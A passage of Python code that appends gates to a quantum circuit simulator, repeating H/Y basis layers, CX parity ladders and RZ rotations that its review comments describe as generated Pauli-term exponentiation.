    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# Eight basis-sandwich passes for the RZ(1.36769) rotation on qubit 1.
# Pre/post rotations act on qubits (6, 4, 1, 1); ladder 6->5->4->3->2->1.
_targets = (6, 4, 1, 1)
_ladder = ((6, 5), (5, 4), (4, 3), (3, 2), (2, 1))
for _pat in ("HHHH", "YYYY", "HYHY", "YHYH", "YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(1.36769, 1))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# Eight basis-sandwich passes for the RZ(4.481711) rotation on qubit 2.
# Pre/post rotations act on qubits (6, 4, 2, 2); ladder 6->5->4->3->2.
_targets = (6, 4, 2, 2)
_ladder = ((6, 5), (5, 4), (4, 3), (3, 2))
for _pat in ("HHHH", "YYYY", "HYHY", "YHYH", "YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(4.481711, 2))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# Eight basis-sandwich passes for the RZ(0.3846725) rotation on qubit 0.
# Pre/post rotations act on qubits (6, 5, 0, 0); ladder 6->5->1->0.
_targets = (6, 5, 0, 0)
_ladder = ((6, 5), (5, 1), (1, 0))
for _pat in ("HHHH", "YYYY", "HYHY", "YHYH", "YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(0.3846725, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# Eight basis-sandwich passes for the RZ(4.746693) rotation on qubit 0.
# Pre/post rotations act on qubits (6, 5, 0, 0); ladder 6->5->2->1->0.
_targets = (6, 5, 0, 0)
_ladder = ((6, 5), (5, 2), (2, 1), (1, 0))
for _pat in ("HHHH", "YYYY", "HYHY", "YHYH", "YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(4.746693, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# Eight basis-sandwich passes for the RZ(1.945438) rotation on qubit 1.
# Pre/post rotations act on qubits (6, 5, 1, 1); ladder 6->5->2->1.
_targets = (6, 5, 1, 1)
_ladder = ((6, 5), (5, 2), (2, 1))
for _pat in ("HHHH", "YYYY", "HYHY", "YHYH", "YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(1.945438, 1))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# One generated term, restyled from 8 verbatim repetitions into a
# data-driven loop.  Each pass appends, in this exact order: an H/Y
# layer on qubits (6, 5, 0, 0); the CX ladder; RZ(2.899853) on qubit 0;
# the ladder reversed; the identical H/Y layer again.
# NOTE(review): reads like Trotterized Pauli-term exponentiation from a
# circuit generator — confirm before changing gate order.
_ladder = ((6, 5), (5, 3), (3, 2), (2, 1), (1, 0))
_qubits = (6, 5, 0, 0)
for _layer in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(2.899853, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
# One generated term, restyled from 8 verbatim repetitions into a
# data-driven loop.  Each pass appends, in this exact order: an H/Y
# layer on qubits (6, 5, 1, 1); the CX ladder; RZ(1.523242) on qubit 1;
# the ladder reversed; the identical H/Y layer again.
# NOTE(review): reads like Trotterized Pauli-term exponentiation from a
# circuit generator — confirm before changing gate order.
_ladder = ((6, 5), (5, 3), (3, 2), (2, 1))
_qubits = (6, 5, 1, 1)
for _layer in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(1.523242, 1))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
# One generated term, restyled from 8 verbatim repetitions into a
# data-driven loop.  Each pass appends, in this exact order: an H/Y
# layer on qubits (6, 5, 2, 2); the CX ladder; RZ(0.9439592) on
# qubit 2; the ladder reversed; the identical H/Y layer again.
# NOTE(review): reads like Trotterized Pauli-term exponentiation from a
# circuit generator — confirm before changing gate order.
_ladder = ((6, 5), (5, 3), (3, 2))
_qubits = (6, 5, 2, 2)
for _layer in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(0.9439592, 2))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
# One generated term, restyled from 8 verbatim repetitions into a
# data-driven loop.  Each pass appends, in this exact order: an H/Y
# layer on qubits (6, 5, 0, 0); the CX ladder; RZ(3.380417) on qubit 0;
# the ladder reversed; the identical H/Y layer again.
# NOTE(review): reads like Trotterized Pauli-term exponentiation from a
# circuit generator — confirm before changing gate order.
_ladder = ((6, 5), (5, 4), (4, 3), (3, 2), (2, 1), (1, 0))
_qubits = (6, 5, 0, 0)
for _layer in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(3.380417, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
# One generated term, restyled from 8 verbatim repetitions into a
# data-driven loop.  Each pass appends, in this exact order: an H/Y
# layer on qubits (6, 5, 1, 1); the CX ladder; RZ(4.625813) on qubit 1;
# the ladder reversed; the identical H/Y layer again.
# NOTE(review): reads like Trotterized Pauli-term exponentiation from a
# circuit generator — confirm before changing gate order.
_ladder = ((6, 5), (5, 4), (4, 3), (3, 2), (2, 1))
_qubits = (6, 5, 1, 1)
for _layer in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(4.625813, 1))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
# One generated term, restyled from 8 verbatim repetitions into a
# data-driven loop.  Each pass appends, in this exact order: an H/Y
# layer on qubits (6, 5, 2, 2); the CX ladder; RZ(1.281574) on qubit 2;
# the ladder reversed; the identical H/Y layer again.
# NOTE(review): reads like Trotterized Pauli-term exponentiation from a
# circuit generator — confirm before changing gate order.
_ladder = ((6, 5), (5, 4), (4, 3), (3, 2))
_qubits = (6, 5, 2, 2)
for _layer in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(1.281574, 2))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
# One generated term, restyled from 8 verbatim repetitions into a
# data-driven loop.  Each pass appends, in this exact order: an H/Y
# layer on qubits (6, 5, 3, 3); the CX ladder; RZ(3.22988) on qubit 3;
# the ladder reversed; the identical H/Y layer again.
# NOTE(review): reads like Trotterized Pauli-term exponentiation from a
# circuit generator — confirm before changing gate order.
_ladder = ((6, 5), (5, 4), (4, 3))
_qubits = (6, 5, 3, 3)
for _layer in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(3.22988, 3))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
# One generated term, restyled from 8 verbatim repetitions into a
# data-driven loop.  Each pass appends, in this exact order: an H/Y
# layer on qubits (7, 2, 0, 0); the CX ladder; RZ(6.152348) on qubit 0;
# the ladder reversed; the identical H/Y layer again.
# NOTE(review): reads like Trotterized Pauli-term exponentiation from a
# circuit generator — confirm before changing gate order.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3), (3, 2), (2, 1), (1, 0))
_qubits = (7, 2, 0, 0)
for _layer in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(6.152348, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
# One generated term, restyled from 8 verbatim repetitions into a
# data-driven loop.  Each pass appends, in this exact order: an H/Y
# layer on qubits (7, 3, 0, 0); the CX ladder — note it skips qubit 2,
# stepping (3, 1), as in the original; RZ(5.685957) on qubit 0; the
# ladder reversed; the identical H/Y layer again.
# NOTE(review): reads like Trotterized Pauli-term exponentiation from a
# circuit generator — confirm before changing gate order.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3), (3, 1), (1, 0))
_qubits = (7, 3, 0, 0)
for _layer in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(5.685957, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _name, _q in zip(_layer, _qubits):
        sim.append(getattr(sim, _name)(_q))
# Rotation-term group, angle 2.287362 on qubit 0.
# Eight repetitions; each applies basis gates on qubits (7, 3, 0, 0), a CX
# parity ladder 7-6-5-4-3-2-1-0, RZ(2.287362) on qubit 0, then un-computes
# the ladder and basis gates in exact reverse/identical order.
# The (H/Y) tuples are the literal per-repetition basis choices.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3), (3, 2), (2, 1), (1, 0))
for _combo in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _g, _q in zip(_combo, (7, 3, 0, 0)):
        sim.append(getattr(sim, _g)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(2.287362, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_combo, (7, 3, 0, 0)):
        sim.append(getattr(sim, _g)(_q))
# Rotation-term group, angle 5.950509 on qubit 1.
# Eight repetitions; each applies basis gates on qubits (7, 3, 1, 1), a CX
# parity ladder 7-6-5-4-3-2-1, RZ(5.950509) on qubit 1, then un-computes
# the ladder and basis gates in exact reverse/identical order.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3), (3, 2), (2, 1))
for _combo in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _g, _q in zip(_combo, (7, 3, 1, 1)):
        sim.append(getattr(sim, _g)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(5.950509, 1))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_combo, (7, 3, 1, 1)):
        sim.append(getattr(sim, _g)(_q))
# Rotation-term group, angle 2.615899 on qubit 0.
# Eight repetitions; each applies basis gates on qubits (7, 4, 0, 0), a CX
# parity ladder 7-6-5-4-1-0, RZ(2.615899) on qubit 0, then un-computes
# the ladder and basis gates in exact reverse/identical order.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 1), (1, 0))
for _combo in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _g, _q in zip(_combo, (7, 4, 0, 0)):
        sim.append(getattr(sim, _g)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(2.615899, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_combo, (7, 4, 0, 0)):
        sim.append(getattr(sim, _g)(_q))
# Rotation-term group, angle 3.300548 on qubit 0.
# Eight repetitions; each applies basis gates on qubits (7, 4, 0, 0), a CX
# parity ladder 7-6-5-4-2-1-0, RZ(3.300548) on qubit 0, then un-computes
# the ladder and basis gates in exact reverse/identical order.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 2), (2, 1), (1, 0))
for _combo in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _g, _q in zip(_combo, (7, 4, 0, 0)):
        sim.append(getattr(sim, _g)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(3.300548, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_combo, (7, 4, 0, 0)):
        sim.append(getattr(sim, _g)(_q))
# Rotation-term group, angle 5.061758 on qubit 1.
# Eight repetitions; each applies basis gates on qubits (7, 4, 1, 1), a CX
# parity ladder 7-6-5-4-2-1, RZ(5.061758) on qubit 1, then un-computes
# the ladder and basis gates in exact reverse/identical order.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 2), (2, 1))
for _combo in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _g, _q in zip(_combo, (7, 4, 1, 1)):
        sim.append(getattr(sim, _g)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(5.061758, 1))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_combo, (7, 4, 1, 1)):
        sim.append(getattr(sim, _g)(_q))
# Rotation-term group, angle 1.297123 on qubit 0.
# Eight repetitions; each applies basis gates on qubits (7, 4, 0, 0), a CX
# parity ladder 7-6-5-4-3-2-1-0, RZ(1.297123) on qubit 0, then un-computes
# the ladder and basis gates in exact reverse/identical order.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3), (3, 2), (2, 1), (1, 0))
for _combo in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _g, _q in zip(_combo, (7, 4, 0, 0)):
        sim.append(getattr(sim, _g)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(1.297123, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_combo, (7, 4, 0, 0)):
        sim.append(getattr(sim, _g)(_q))
# Rotation-term group, angle 5.49365 on qubit 1.
# Eight repetitions; each applies basis gates on qubits (7, 4, 1, 1), a CX
# parity ladder 7-6-5-4-3-2-1, RZ(5.49365) on qubit 1, then un-computes
# the ladder and basis gates in exact reverse/identical order.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3), (3, 2), (2, 1))
for _combo in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _g, _q in zip(_combo, (7, 4, 1, 1)):
        sim.append(getattr(sim, _g)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(5.49365, 1))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_combo, (7, 4, 1, 1)):
        sim.append(getattr(sim, _g)(_q))
# Rotation-term group, angle 4.918651 on qubit 2.
# Eight repetitions; each applies basis gates on qubits (7, 4, 2, 2), a CX
# parity ladder 7-6-5-4-3-2, RZ(4.918651) on qubit 2, then un-computes
# the ladder and basis gates in exact reverse/identical order.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3), (3, 2))
for _combo in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    for _g, _q in zip(_combo, (7, 4, 2, 2)):
        sim.append(getattr(sim, _g)(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(4.918651, 2))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_combo, (7, 4, 2, 2)):
        sim.append(getattr(sim, _g)(_q))
# Generated Pauli-term rotation section: 8 basis-conjugation rounds around
# RZ(3.591062) on qubit 0, each wrapped in a CX parity ladder over (7,6,5,1,0).
# NOTE(review): looks like exp(-i*theta/2 * P)-style generated code; the exact
# original gate sequence is reproduced gate for gate, in order.
_rounds = [
    ('H', 'H', 'H', 'H'),
    ('Y', 'Y', 'Y', 'Y'),
    ('H', 'Y', 'H', 'Y'),
    ('Y', 'H', 'Y', 'H'),
    ('Y', 'Y', 'H', 'H'),
    ('H', 'H', 'Y', 'Y'),
    ('Y', 'H', 'H', 'Y'),
    ('H', 'Y', 'Y', 'H'),
]
_qubits = (7, 5, 0, 0)
_ladder = [(7, 6), (6, 5), (5, 1), (1, 0)]
for _gates in _rounds:
    # basis change in
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
    # entangle: parity ladder down to the rotation target
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(3.591062, 0))
    # un-entangle: ladder in reverse
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    # basis change out (same gates again)
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
# Generated Pauli-term rotation section: 8 basis-conjugation rounds around
# RZ(2.456721) on qubit 0, CX parity ladder over (7,6,5,2,1,0).
# Original gate sequence reproduced gate for gate, in order.
_rounds = [
    ('H', 'H', 'H', 'H'),
    ('Y', 'Y', 'Y', 'Y'),
    ('H', 'Y', 'H', 'Y'),
    ('Y', 'H', 'Y', 'H'),
    ('Y', 'Y', 'H', 'H'),
    ('H', 'H', 'Y', 'Y'),
    ('Y', 'H', 'H', 'Y'),
    ('H', 'Y', 'Y', 'H'),
]
_qubits = (7, 5, 0, 0)
_ladder = [(7, 6), (6, 5), (5, 2), (2, 1), (1, 0)]
for _gates in _rounds:
    # basis change in
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
    # entangle: parity ladder down to the rotation target
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(2.456721, 0))
    # un-entangle: ladder in reverse
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    # basis change out (same gates again)
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
# Generated Pauli-term rotation section: 8 basis-conjugation rounds around
# RZ(5.109929) on qubit 1, CX parity ladder over (7,6,5,2,1).
# Original gate sequence reproduced gate for gate, in order.
_rounds = [
    ('H', 'H', 'H', 'H'),
    ('Y', 'Y', 'Y', 'Y'),
    ('H', 'Y', 'H', 'Y'),
    ('Y', 'H', 'Y', 'H'),
    ('Y', 'Y', 'H', 'H'),
    ('H', 'H', 'Y', 'Y'),
    ('Y', 'H', 'H', 'Y'),
    ('H', 'Y', 'Y', 'H'),
]
_qubits = (7, 5, 1, 1)
_ladder = [(7, 6), (6, 5), (5, 2), (2, 1)]
for _gates in _rounds:
    # basis change in
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
    # entangle: parity ladder down to the rotation target
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(5.109929, 1))
    # un-entangle: ladder in reverse
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    # basis change out (same gates again)
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
# Generated Pauli-term rotation section: 8 basis-conjugation rounds around
# RZ(2.490813) on qubit 0, CX parity ladder over (7,6,5,3,2,1,0).
# Original gate sequence reproduced gate for gate, in order.
_rounds = [
    ('H', 'H', 'H', 'H'),
    ('Y', 'Y', 'Y', 'Y'),
    ('H', 'Y', 'H', 'Y'),
    ('Y', 'H', 'Y', 'H'),
    ('Y', 'Y', 'H', 'H'),
    ('H', 'H', 'Y', 'Y'),
    ('Y', 'H', 'H', 'Y'),
    ('H', 'Y', 'Y', 'H'),
]
_qubits = (7, 5, 0, 0)
_ladder = [(7, 6), (6, 5), (5, 3), (3, 2), (2, 1), (1, 0)]
for _gates in _rounds:
    # basis change in
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
    # entangle: parity ladder down to the rotation target
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(2.490813, 0))
    # un-entangle: ladder in reverse
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    # basis change out (same gates again)
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
# Generated Pauli-term rotation section: 8 basis-conjugation rounds around
# RZ(0.631166) on qubit 1, CX parity ladder over (7,6,5,3,2,1).
# Original gate sequence reproduced gate for gate, in order.
_rounds = [
    ('H', 'H', 'H', 'H'),
    ('Y', 'Y', 'Y', 'Y'),
    ('H', 'Y', 'H', 'Y'),
    ('Y', 'H', 'Y', 'H'),
    ('Y', 'Y', 'H', 'H'),
    ('H', 'H', 'Y', 'Y'),
    ('Y', 'H', 'H', 'Y'),
    ('H', 'Y', 'Y', 'H'),
]
_qubits = (7, 5, 1, 1)
_ladder = [(7, 6), (6, 5), (5, 3), (3, 2), (2, 1)]
for _gates in _rounds:
    # basis change in
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
    # entangle: parity ladder down to the rotation target
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(0.631166, 1))
    # un-entangle: ladder in reverse
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    # basis change out (same gates again)
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
# Generated Pauli-term rotation section: 8 basis-conjugation rounds around
# RZ(1.65175) on qubit 2, CX parity ladder over (7,6,5,3,2).
# Original gate sequence reproduced gate for gate, in order.
_rounds = [
    ('H', 'H', 'H', 'H'),
    ('Y', 'Y', 'Y', 'Y'),
    ('H', 'Y', 'H', 'Y'),
    ('Y', 'H', 'Y', 'H'),
    ('Y', 'Y', 'H', 'H'),
    ('H', 'H', 'Y', 'Y'),
    ('Y', 'H', 'H', 'Y'),
    ('H', 'Y', 'Y', 'H'),
]
_qubits = (7, 5, 2, 2)
_ladder = [(7, 6), (6, 5), (5, 3), (3, 2)]
for _gates in _rounds:
    # basis change in
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
    # entangle: parity ladder down to the rotation target
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(1.65175, 2))
    # un-entangle: ladder in reverse
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    # basis change out (same gates again)
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
# Generated Pauli-term rotation section: 8 basis-conjugation rounds around
# RZ(1.233693) on qubit 0, full CX parity ladder over (7,6,5,4,3,2,1,0).
# Original gate sequence reproduced gate for gate, in order.
_rounds = [
    ('H', 'H', 'H', 'H'),
    ('Y', 'Y', 'Y', 'Y'),
    ('H', 'Y', 'H', 'Y'),
    ('Y', 'H', 'Y', 'H'),
    ('Y', 'Y', 'H', 'H'),
    ('H', 'H', 'Y', 'Y'),
    ('Y', 'H', 'H', 'Y'),
    ('H', 'Y', 'Y', 'H'),
]
_qubits = (7, 5, 0, 0)
_ladder = [(7, 6), (6, 5), (5, 4), (4, 3), (3, 2), (2, 1), (1, 0)]
for _gates in _rounds:
    # basis change in
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
